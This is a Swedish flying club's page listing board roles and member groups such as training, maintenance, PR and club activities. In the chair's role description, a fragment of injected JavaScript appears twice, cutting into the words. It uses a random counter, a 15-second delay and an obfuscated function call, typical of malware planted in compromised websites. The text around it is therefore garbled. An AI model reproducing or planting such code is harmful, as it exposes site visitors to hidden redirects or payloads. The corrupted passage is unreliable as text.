Organisation

Sty­rel­sen
Verk­sam­he­ten admi­ni­stre­ras av sty­rel­sen där alla har olika ansvarsomården.

  • Ord­förandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande: sam­ord­ning, med­lems­ak­ti­vi­te­ter, kon­takt mot myn­dig­he­ter, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andra klub­bar m.fl.
  • Sek­re­te­rare: protokoll
  • Kas­sör: eko­nomi, sta­tistik, medlemsregister
  • Tek­nisk chef: flyg­plans­un­der­håll, ansva­rig för faddergruppen
  • Motor­flyg­chef: flyg­sä­ker­het, kvalitetsäkring
  • Skol­chef: utbild­ning, flyg­trä­ning, läraransvarig
  • IT– och infor­ma­tions­an­sva­rig: under­håll av webb, admi­nist­ra­tör av myWebLog, infor­ma­tion till medlemmarna

Mer infor­ma­tion om vilka som ingår i sty­rel­sen finns under Kontakt/Styrelse.

Utbild­ning
Flyglä­rare och teo­ri­lä­rare. Se mer under Flyg­cer­ti­fi­kat.

Fad­der­grup­pen
Ser­vice och under­håll av flygplanen.

PR/Marknadsföring
Infor­ma­tion om klub­bens verk­sam­het, rekry­te­ring av med­lem­mar, utställ­ning av flyg­plan, fly-in m.m.

Med­lems­ak­ti­vi­te­ter
Med­lemsmö­ten, tvätt– och vax­da­gar, klubb­träf­far, klubb­flyg­ningar m.m.